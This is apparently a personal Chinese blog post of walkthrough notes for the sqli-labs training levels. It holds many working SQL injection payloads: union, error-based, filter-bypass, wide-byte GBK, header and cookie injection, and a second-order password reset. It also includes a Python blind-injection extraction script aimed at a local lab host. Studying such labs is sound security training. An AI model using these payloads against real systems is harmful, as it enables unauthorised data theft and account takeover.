<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>我的技术与生活——sqli_less | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="/imgs/shortcut-icon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/public.css" />
  <link rel="stylesheet" href="/css/layout.css" />
  <link rel="stylesheet" href="/css/iconfont.css" />
  <link rel="stylesheet" href="/css/APlayer.min.css" />
  <script src="/js/APlayer.min.js"></script>
  <script src="/js/jquery.min.js"></script>
  <script src="/js/jquery.pjax.min.js"></script>

  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
  <script>
    document.title = `我的技术与生活——sqli_less`
  </script>
<meta name="generator" content="Hexo 6.3.0"></head>

<style>
  .load {
    width: 100%;
    height: 100vh;
    background-color: rgb(37, 35, 40);
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    position: relative;
    z-index: 9999;
  }
  .load-circle {
    width: 80px;
    height: 80px;
    border: 8px solid orange;
    border-bottom-color: transparent;
    border-radius: 50%;
    display: flex;
    justify-content: center;
    align-items: center;
    animation: rotate 1s linear infinite;
    filter: drop-shadow(0 0 3px orange);
  }
  .load-circle-inner {
    width: 40px;
    height: 40px;
    border: 8px solid orange;
    border-top-color: transparent;
    border-radius: 50%;
    animation: rotate-reverse .5s linear infinite;
  }
  .load-text {
    margin-top: 20px;
    font-size: 24px;
    color: orange;
    display: flex;
  }
  .load-text span {
    margin: 0 5px;
    text-shadow: 5px 5px 5px orange;
    animation: move 1s linear infinite;
  }
  .load-text span:nth-child(1) {
    animation-delay: -0.6s;
  }
  .load-text span:nth-child(2) {
    animation-delay: -0.5s;
  }
  .load-text span:nth-child(3) {
    animation-delay: -0.4s;
  }
  .load-text span:nth-child(4) {
    animation-delay: -0.3s;
  }
  .load-text span:nth-child(5) {
    animation-delay: -0.2s;
  }
  .load-text span:nth-child(6) {
    animation-delay: -0.1s;
  }
  @keyframes rotate {
    0% { transform: rotate(0); }
    100% { transform: rotate(360deg); }
  }
  @keyframes rotate-reverse {
    0% { transform: rotate(0); }
    100% { transform: rotate(-360deg); }
  }
  @keyframes move {
    0% { transform: translateY(0%) rotate(0) scale(1); }
    20% { transform: translateY(20%) rotate(10deg) scale(1.2); }
    80% { transform: translateY(-10%) rotate(-20deg) scale(.8);}
    100% { transform: translateY(0) rotate(0) scale(1); }
  }

  .progress {
    position: fixed;
    left: 0; top: 0;
    width: 0;
    height: 3px;
    background-color: green;
    transition: all cubic-bezier(0.215, 0.610, 0.355, 1) .1s;
    z-index: 9999;
  }

  .to-up {
    animation: toUp .5s 1;
  }
  .gray {
    position: fixed;
    left: 0;
    top: 0;
    width: 100%;
    height: 100vh;
    z-index: 9999;
    display: none;
    pointer-events: none;
    background-color: #000;
    mix-blend-mode: color;
  }
  @keyframes toUp {
    from { transform: translateY(15px); opacity: 0; }
    to { transform: translateY(0) ; opacity: 1; }
  }
</style>
<body>
  <div id="load" class="load">
    <div class="load-circle">
      <div class="load-circle-inner"></div>
    </div>
    <p class="load-text">
      <span>L</span>
      <span>O</span>
      <span>A</span>
      <span>D</span>
      <span>I</span>
      <span>N</span>
      <span>G</span>
    </p>
  </div>
  <div id="container" class="container w-100 vh-100" style="display: none;">
    <header class="header">
  <div class="header-wrapper">
    <div class="header-left">
      <div class="header-search">
        <input id="search-input" type="text" class="header-search--input" placeholder="请输入要检索的文章标题" />
        <span id="search-btn" class="header-search--icon"><i class="iconfont icon-sousuo"></i></span>
      </div>
      <div id="search-layer" class="header-search--layer hidden">
        <p class="title">
          <span>以下是搜索内容：</span>
          <span id="close-layer-btn">关闭</span>
        </p>
        <ul>
        </ul>
      </div>
    </div>
    <div class="header-right">
      <ul class="header-menu">
        <li>
          <a href="http://example.com/">
            <i class="header-menu--icon iconfont icon-shouye"></i>
            <span class="header-menu--span">首页</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/log">
            <i class="header-menu--icon iconfont icon-rizhi"></i>
            <span class="header-menu--span">日志</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/link">
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
            <span class="header-menu--span">友情链接</span>
          </a>
        </li>
        <li>
          <a href="http://example.com/about">
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
            <span class="header-menu--span">关于我</span>
          </a>
        </li>
      </ul>
    </div>
  </div>
</header>

<script>
  const ipt = document.querySelector('#search-input')
  const btn = document.querySelector('#search-btn')
  const layer = document.querySelector('#search-layer')
  const posts = JSON.parse(`[{"title":"Linux基本命令与ssh远程登录","path":"2023/12/10/Linux基本命令与ssh远程登录/"},{"title":"MySQL控制网站","path":"2024/01/05/MySQL控制网站/"},{"title":"Yakit和Burp","path":"2023/12/24/Yakit和Burp/"},{"title":"html","path":"2023/12/10/html/"},{"title":"php","path":"2023/12/17/php/"},{"title":"python语法","path":"2023/12/10/python语法/"},{"title":"sqli_less","path":"2024/01/01/sqli-less/"},{"title":"sqlmap","path":"2024/01/05/sqlmap/"},{"title":"vue动态页面","path":"2023/12/17/vue动态页面/"},{"title":"sql注入MySQL5.7.26版本","path":"2023/12/24/sql注入MySQL5-7-26版本/"},{"title":"利用github搭建hexo博客","path":"2023/11/30/利用github搭建hexo博客/"},{"title":"安卓病毒监听与Proxifier","path":"2023/12/10/安卓病毒监听与Proxifier/"},{"title":"笔记","path":"2023/11/30/笔记/"},{"title":"绕过安全狗（免费）","path":"2024/01/05/绕过安全狗（免费）/"},{"title":"网络基础","path":"2023/12/10/网络基础/"},{"title":"部署图床","path":"2023/11/30/部署图床/"},{"title":"钓鱼网站","path":"2023/11/30/钓鱼网站/"}]`)
  ipt.addEventListener('keyup', e => {
    if (e.key === 'Enter') {
      handleSearch()
    }
  })
  btn.addEventListener('click', () => {
    handleSearch()
  })

  document.querySelector('#close-layer-btn').addEventListener('click', () => {
    layer.classList.toggle('hidden')
  })

  function handleSearch() {
    if (ipt.value.trim() === '') {
      return
    }
    let html = ''
    const targetPosts = posts.filter(post => post.title.includes(ipt.value))
    targetPosts.forEach(post => {
      html += `
        <li>
          <div>
            <a href="/${post.path}">${post.title.replace(new RegExp(ipt.value), `<span>${ipt.value}</span>`)}</a>
          </div>
          <img src="${post.cover || '/imgs/default-cover.webp' }" />
        </li>
      `
    })
    if (html.trim () === '') {
      html += '<p class="empty">没有搜索到内容</p>'
    }
    layer.querySelector('ul').innerHTML = html
    layer.classList.remove('hidden')
  }
</script> 
    <section id="main" class="main">
      <div class="main-left-wrapper">
<div class="main-left">
  <div class="main-left--block">
    <div class="main-left--info">
      <img src="/imgs/avatar.jpg"" class="main-left--avatar" />
      <div class="main-left--intro">
        <p class="main-left--name">xiao.</p>
        <div class="main-left--tags">
          <span class="main-left--tag">学习</span>
          <span class="main-left--tag">摸鱼</span>
        </div>
      </div>
    </div>
  
    <div>
      <div class="main-left--motto">
        <p>“天下莫弱于水，而攻坚者莫之能胜，”</p>
        <p>“上善若水。”</p>
      </div>
      <div class="main-left--github">
        <span class="line"></span>
        <a target="_blank" rel="noopener" href="https://github.com/Aizener"><i class="logo iconfont icon-github-fill"></i></a>
        <span class="line"></span>
      </div>
      <div class="main-left--statics">
        <a href="/categories">
          <div>
            <span>0</span>
            <span>分类</span>
          </div>
        </a>
        <a href="/tags">
          <div>
            <span>0</span>
            <span>标签</span>
          </div>
        </a>
        <a href="/archives">
          <div>
            <span>3 </span>
            <span>归档</span>
          </div>
        </a>
      </div>
    </div>
  </div>

  <div class="main-left--block">
    <ul class="main-left--menu">
      
        <li>
          <a href="/">
            <span class="header-menu--span">小站首页</span>
            <i class="header-menu--icon iconfont icon-shouye"></i>
          </a>
        </li>
      
        <li>
          <a href="/log">
            <span class="header-menu--span">个人日志</span>
            <i class="header-menu--icon iconfont icon-rizhi"></i>
          </a>
        </li>
      
        <li>
          <a href="/link">
            <span class="header-menu--span">友情链接</span>
            <i class="header-menu--icon iconfont icon-youqinglianjie"></i>
          </a>
        </li>
      
        <li>
          <a href="/about">
            <span class="header-menu--span">关于自己</span>
            <i class="header-menu--icon iconfont icon-guanyuwomen"></i>
          </a>
        </li>
      
    </ul>
  </div>

  <div class="main-left--block">
    <div class="main-left--site">
      <h5 class="main-left--title">
        <span>站点信息</span>
        <i class="iconfont icon-zhandian"></i>
      </h5>
      <p class="main-left--subtitle">
        <span>文章数目：</span>
        <span>17 篇</span>
      </p>
      <p class="main-left--subtitle">
        <span>最近动态：</span>
        <span>今天</span>
      </p>
      <p class="main-left--subtitle">
        <span>上线时间：</span>
        <span>37天</span>
      </p>
      <p class="main-left--subtitle">
        <span>当前版本：</span>
        <span>v1.0.2</span>
      </p>
    </div>
  </div>
</div></div>
      <div id="main-container" class="main-container">


  <link rel="stylesheet" href="/css/partial/article.css" />

<div class="article-container">
  <div class="article">
    <h1 class="article-title">sqli_less</h1>
    <div class="article-info">
      <div class="article-info--item">
        <div class="article-info--info">
          
          <div class="article-info--categories">
            <span>分类：</span>
            
          </div>
          
          
          <div class="article-info--tags">
            <span>标签：</span>
            
          </div>
          
          <p class="article-info--date">日期：2024-01-01 22:39:49</p>
        </div>
        <img src="/imgs/default-cover.webp" alt="" class="article-cover">
      </div>
    </div>
    <article class="article-content markdown-body">
      <p>闯关的时候发现一个神奇的情况，如果字段本身是int类型，并且在查询语句中该字段的值被双引号或者单引号包裹，则只要值是以正确数字开头的，后面接多余的字符还是可以返回正确的查询结果，甚至单引号中可以包含双引号，双引号中可以包含单引号。<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119809212-f76eb245-ac9e-41dd-b3bb-c4c726de2cf8.png" alt="image.png"><br>第1关<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119329710-425242f9-3b1c-402f-a803-ef9432198410.png" alt="image.png"><br>&#x2F;Less-1&#x2F;?id&#x3D;-1’ union select1,2,database()– -<br>第2关<br>联合注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119416277-f18766b2-b447-4225-8f2a-6df968cb6fdd.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119586284-bcce5116-80aa-4fd5-92d2-beeb90c85551.png" alt="image.png"><br>第3关<br>输入不符合sql语法是会在页面上返回报错信息的，根据这个就可以明确知道需要闭合什么符号，比如这关闭合是’)<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119689252-59a88352-9e7c-4feb-a6ec-0a5e14516d64.png" alt="image.png"><br>第4关<br>输入不符合sql语法是会在页面上返回报错信息的，根据这个就可以明确知道需要闭合什么符号，比如这关闭合是”)<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1704119868693-753067b4-8560-4031-85db-47f8d9bc8cfc.png" alt="image.png"><br>第5关<br>报错注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703388320138-5ca967c1-d5ae-49e6-a13a-60d17c7475b9.png" alt="image.png"><br>第6关<br>盲注<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703388753697-d886a01a-b137-4e7b-8562-fabbddaff1a7.png" alt="image.png"><br>第7关<br>盲注<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703399232243-61afaebd-ab9a-43b0-b89b-c4111d4cb143.png" alt="image.png"><br>第8关<br>盲注<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703400177105-cccb8788-a135-4e8d-bdb3-2732f6b661eb.png" alt="image.png"><br>第11关<br>1’ union  select 1,2 #（– -无效，把– -改为#）<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703422448157-5a0a1863-8894-46e5-af47-816bdce482f8.png" alt="image.png"><br>sqlmap<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703403658538-5b03ef12-172a-4e4d-999e-f9f35975b625.png" alt="image.png"><br>第12关<br>-1”) union  select 1,database() #        （和第11关一样）<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703422796974-cb207a6d-7ad2-4fa6-8aad-96c4d6df05d5.png" alt="image.png"><br>第13关<br>报错注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703422996144-0a2d55a2-fe18-455f-a3a4-27c069bc1587.png" alt="image.png"><br>第14关<br>1  1’没反应   1”报错<br>报错<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703424574677-e36e39aa-511c-4239-bb7f-a252814bc20b.png" alt="image.png"></p>
<p>第17关<br>username把后面的给注释掉了，要在用户名正确的情况下在password上注入<br>报错注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703472767137-c8c29097-4228-4a9c-9716-4d12389ae38f.png" alt="image.png"><br>第18关<br>输入正确的用户名，密码，显示User Agent头，在ua头里注入，注意闭合，然后继续报错注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703474073574-0b5714b7-29dc-4bd0-a58a-88bf554cc025.png" alt="image.png"><br>第19关<br>和第18关类似，用户密码正确从显示ua头变成了 Referer<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703474418183-0f05ca15-ea4c-49d6-b644-e08b7c76cd00.png" alt="image.png"><br>第20关<br>登录admin跳转页面显示User-Agent，客户端ip地址，cookie，用户名，密码，用户id<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703475121807-7c3d276f-08ed-4262-a339-891d81d9baa0.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703475062497-f3f8dacd-a1c8-4cd6-b6c9-1ac9d487aabf.png" alt="image.png"><br>第21关<br>cookie的admin经过一次base64编码了，所以就在cookie位置以编码的显示继续尝试，把admin’编码<br>得到报错，获得闭合为’)<br>报错和联合都可以，这里用报错<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703578616962-c0df2810-0711-4984-93a7-f42e3d38fe4f.png" alt="image.png"><br>用报错注入，除了每条payload都要经过一次base64编码（如果base64编码结果包含等号还要进行url编码），再作为uname的值发送。<br>:::warning<br>报错语句：admin’) or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),1,31),0x7e),1) or (‘<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703579010354-2407925d-f6d7-4a0d-a2cc-f3f7e719abc4.png" alt="image.png"><br>第22关<br>和21关一样，用在uname 进行admin”编码，报错获得闭合为”，剩下的都一样<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703579425287-874f320b-cf09-4708-8238-d63fa3f3081f.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703579942445-fcf0e4f2-5fce-4d18-a607-98b7a30342dc.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703580522203-66b89f46-2156-469d-8311-1ad2977e755e.png" alt="image.png"><br>第23关<br>注释被过滤了用不了，可以用闭合<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703581478654-e61f837b-395f-4b94-ac24-c5b70677661b.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703581422115-fd5d9f82-84af-4640-af46-4ceeb46b6e13.png" alt="image.png"><br>注释被过滤了，用其他方法获得列，试了几个最后&#x2F;?id&#x3D;-1’ union select 1,2,3’ 得到3列<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703581985385-fe1b0a66-5e95-47df-a6a4-88a4c7d9d6d2.png" alt="image.png"><br>得到列后用联合注入获得表<br>:::warning<br>&#x2F;?id&#x3D;-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()),3’<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703582240916-6e7856f0-dca6-45d1-8642-79cd83e4f1bc.png" alt="image.png"><br>第24关<br>注册新用户admin’#，密码随意，以admin’#登录,修改密码为456,点reset之后再logout，然后用用户名admin，密码456登录，可以登录成功<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703589703439-9d208928-8205-4ae1-b67f-3b303841b1f0.png" alt="image.png"><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703589768432-e4c0c65e-4783-4183-b5cf-25ff52c58326.png" alt="image.png"><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703589798214-fa7e7767-5210-46e1-8957-37e761131cfe.png" alt="image.png"><br>第25关<br>通过尝试，报错得出闭合是’<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703590709401-5f0def61-0195-4826-90b2-6e7d7686ef8f.png" alt="image.png"><br>注释被过滤了，用和23关一样的方法做，得到3列<br>-1’ union select 1,2,3 ‘<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703590643324-c07d65c6-90d8-4529-a7c4-3aa6a5f25f85.png" alt="image.png"><br>-1’ union select 1,2,database()’<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703590887294-1d399333-cf97-4f84-93b5-88967857112e.png" alt="image.png"><br>第25a关<br>发现报错了，但没有爆出具体的错误。mysql_fetch_array() 函数从结果集中取得一行作为关联数组，或数字数组，或二者兼有，返回如下错误说明没有查询结果，也就是说sql语句没有正确执行。<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703591508594-29f4d5c0-f773-4b20-847d-8189812c86fc.png" alt="image.png"><br>试了很多形式，报错都不出来，根据源代码发现是因为闭合为空。<br>返回正确查询结果，说明本关无闭合符号。<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703591640942-d9460aed-327a-4683-9c48-ad2d4719bb7f.png" alt="image.png"><br>-1 union select 1,2,3<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703591421414-2b315e89-2e51-4882-b93e-7ba44c637ffd.png" alt="image.png"><br>:::warning<br>-1 union select 1,2,database()<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703591429461-c2897e7a-a535-4423-aca1-4fedb91bbbbe.png" alt="image.png"><br>第26关<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703591789355-96dfef4b-751b-4106-90ef-4c8f9add6202.png" alt="image.png"><br>试了多行注释，以及几种常见的空白符（其实严谨点可以burpsuite中拿所有空白符爆破一下），都没办法绕过。<br>试试报错注入加括号绕过：<br>以爆所有数据库名称为例，需要注意这关还是过滤了and和or，并且可以用双写的方法绕过；过滤注释符之后，需要用or ‘1’&#x3D;’1’闭合单引号。<br>重点：对and，or进行双写的方法绕过过滤，用or ‘1’&#x3D;’1’闭合单引号(or’也行)。<br>:::warning<br>1’aandnd(extractvalue(1,concat(0x7e,(selectdatabase()),0x7e)))oorr’<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703593328913-cfa866d8-4243-45b0-b6ed-2956da377cca.png" alt="image.png"><br>第26a关</p>
<p>第27关<br>多尝试几次之后发现，本关有以下过滤：<br>1、过滤空格，可以用%0a绕过<br>2、过滤union，可以用双写绕过<br>3、过滤select，可以大写某些字母绕过<br>4、过滤注释符，绕不过，可以用and ‘1’&#x3D;’1替代<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703596674721-6cb892bb-6249-44b4-a0bc-331a447e9f1f.png" alt="image.png"><br>:::warning<br>?id&#x3D;0%27%0aununionion%0aSElect%0a1,(seLEct%0adatabase()),3%0aand%0a%271%27&#x3D;%271<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703596657371-83800b76-ee47-42e6-8938-6abc47837622.png" alt="image.png"><br>第27a关<br>和27关一样，只是闭合改成了双引号”<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703598052060-1d4e3069-57ae-486f-8735-b4771aa35834.png" alt="image.png"><br>第28关<br>盲注</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">url = <span class="string">&quot;http://192.168.2.25/sqli/Less-28/?id=0&#x27;)&quot;</span></span><br><span class="line">i=<span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> i&gt;<span class="number">0</span>:</span><br><span class="line">    start=<span class="number">31</span></span><br><span class="line">    end=<span class="number">128</span></span><br><span class="line">    temp=start+end//<span class="number">2</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">150</span>):</span><br><span class="line">        paramGet = url+ <span class="string">&quot;||ascii(substr(database(),&#123;0&#125;,1))=0||(&#x27;0&quot;</span>.<span class="built_in">format</span>(i)</span><br><span class="line">        response = requests.get(paramGet)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;Your Login name&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            i=-<span class="number">10</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        paramGet = url+ <span class="string">&quot;||ascii(substr(database(),&#123;0&#125;,1))=&#123;1&#125;||(&#x27;0&quot;</span>.<span class="built_in">format</span>(i,temp)</span><br><span class="line">        response = requests.get(paramGet)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;Your Login name&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            <span class="built_in">print</span>(<span class="built_in">chr</span>(temp),end=<span class="string">&quot;&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        paramGet = url+ <span class="string">&quot;||ascii(substr(database(),&#123;0&#125;,1))&gt;&#123;1&#125;||(&#x27;0&quot;</span>.<span class="built_in">format</span>(i,temp)</span><br><span class="line">        response = requests.get(paramGet)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;Your Login name&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            start=temp</span><br><span class="line">            temp=(start+end)//<span class="number">2</span></span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        paramGet = url+ <span class="string">&quot;||ascii(substr(database(),&#123;0&#125;,1))&lt;&#123;1&#125;||(&#x27;0&quot;</span>.<span class="built_in">format</span>(i,temp)</span><br><span class="line">        response = requests.get(paramGet)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;Your Login name&quot;</span> <span class="keyword">in</span> response.text:</span><br><span class="line">            end=temp</span><br><span class="line">            temp=(start+end)//<span class="number">2</span></span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">    i=i+<span class="number">1</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># http://192.168.2.39/sqli/Less-26a/?id=0&#x27;)||ascii(substr(database(),1,1))=0||(&#x27;1</span></span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>第28a关<br>和28关一样，盲注，或者双写绕过<br>:::warning<br>?id&#x3D;-1’ ) ununion selection select 1,2,database() –+<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703681522164-a6ec4ad4-3c75-46b2-922f-74f4af60011a.png" alt="image.png"><br>第29关<br>闭合为’    列为3，联合注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703682055512-a34013ff-34fb-4389-b1dc-f323efd62319.png" alt="image.png"><br>第30关<br>id&#x3D;1” order by 3 – -   列为3，闭合为”    联合注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703682299383-788053c2-1deb-429b-aa3a-94236504ff03.png" alt="image.png"><br>第31关<br>闭合为”)   列为3，联合注入<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703682572660-708c872c-f878-4549-ab2c-eee6fdc1817c.png" alt="image.png"><br>第32关（宽字节)</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">西欧字母符号，通过<span class="number">1</span>个字节来表示。东亚字符通过至少两个字节来表示。GBK编码就是用两个字节来表示中文区字符的一个编码标准。</span><br><span class="line"></span><br><span class="line">GBK编码依然采用双字节编码方案，其编码范围：<span class="number">8140</span>－FEFE（高字节从<span class="number">81</span>到FE，低字节从<span class="number">40</span>到FE），剔除xx7F码位，共<span class="number">23940</span>个码位。</span><br><span class="line"></span><br><span class="line">条件</span><br><span class="line">后台使用GBK编码的时候，存在着看不见的<span class="built_in">ascii</span>码转换为GBK编码的转换过程，可以使用宽字节注入。</span><br><span class="line"></span><br><span class="line">原理</span><br><span class="line">编码转换存在着单字符被合并的情形</span><br><span class="line"></span><br><span class="line"> 反斜杠对应url编码%5c，是单字节的。</span><br><span class="line"> 在%5c前再加入一个单字节字符%dd（范围可以是<span class="number">81</span>到FE之间），就成了%dd%5c</span><br><span class="line"> 而当后端使用GBK编码的时候，会将合理的两个单字节ANSCII字符解析成一个双字节的GBK编码字符</span><br></pre></td></tr></table></figure>

<p>如果服务器传入数据库的数据是gbk等宽字节编码，可以在特殊字符之前增加一个十六进制字节，和转义符构成一个汉字字符，从而把转义符吃掉。<br>只有闭合单引号时用宽字节注入，其他涉及单引号的部分都要用字符的十六进制编码，否则会报错。<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703644616962-b28e6067-792f-4025-b87e-b22822a17962.png" alt="image.png"><br>找列数，4报错，说明有3列<br><a target="_blank" rel="noopener" href="http://127.0.0.1/sqli/Less-32/?id=1%EF%BF%BD">http://127.0.0.1/sqli/Less-32/?id=1%df</a>‘ order by 4– -<br>爆库名<br>:::warning<br>?id&#x3D;-1%df’ union select1,2,group_concat(schema_name) from information_schema.schemata– -<br>:::<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703644956356-8f72202a-1fd3-432f-b969-5f7ed90a325f.png" alt="image.png"><br>第33关<br>和第32一样<br>?id&#x3D;-1%df’ union select1,2,database() – -<br> <img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703645785960-662e298f-f3b8-49ef-8a80-622dddeab91e.png" alt="image.png"><br>第34关<br>一样的宽字节，<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703647491308-f2c4200e-84e1-4c3c-a21e-f03f41180cf7.png" alt="image.png"><br>第35关<br>这关虽然单引号也被转义了，但是由于这关的id在sql语句中是数字，不涉及闭合，所以这关比前面几关更简单，根本不需要满足宽字节注入的条件，只需要payload中字符串都写成十六进制形式就行。<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703654418550-484684b8-d618-44cc-83ab-eb232b20278d.png" alt="image.png"><br>爆出security库的所有表<br>:::warning<br>?id&#x3D;-1 union select1,2,group_concat(table_name) from information_schema.tables where table_schema&#x3D;7365637572697479– -<br>:::<br>第36关<br>和33关一样<br>?id&#x3D;-1%df’ union select1,2,database() – -<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703655555173-b71e141f-8b7d-46fc-955c-311b0d6bd2ea.png" alt="image.png"><br>第37关<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703655897465-9d83ebeb-d0a8-4c26-ab4a-65f3dcd585e3.png" alt="image.png"><br>第38关<br>列，闭合为’  ，用联合注入就能直接出<br>?id&#x3D;-1’ union select 1,2,database() – -<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703656433228-bbed51dc-c809-4b21-9483-63e6a64ebec4.png" alt="image.png"><br>第39关<br>整型，闭合为空，联合注入直接出<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703678653216-3d186623-7d84-4234-a16d-7e021edd60b3.png" alt="image.png"><br>第40关<br>试出来闭合为’)     列为3，用联合注入直接出来<br><img src="https://raw.githubusercontent.com/xiaoshenhe/tuchuang/main/img/1703679297265-f2856d87-f0dd-42f3-80b9-3c10d3971595.png" alt="image.png"></p>

    </article>
    
    <div class="read-nums">
      <!-- id 将作为查询条件 -->
      <span id="2024/01/01/sqli-less/" class="leancloud_visitors" data-flag-title="Your Article Title">
        <em class="post-meta-item-text">浏览量</em>
        <i class="leancloud-visitors-count"></i>
      </span>
    </div>
    <div class="comments-intro">
      <h2>评论区</h2>
      <p>欢迎你留下宝贵的意见，昵称输入QQ号会显示QQ头像哦~</p>
    </div>
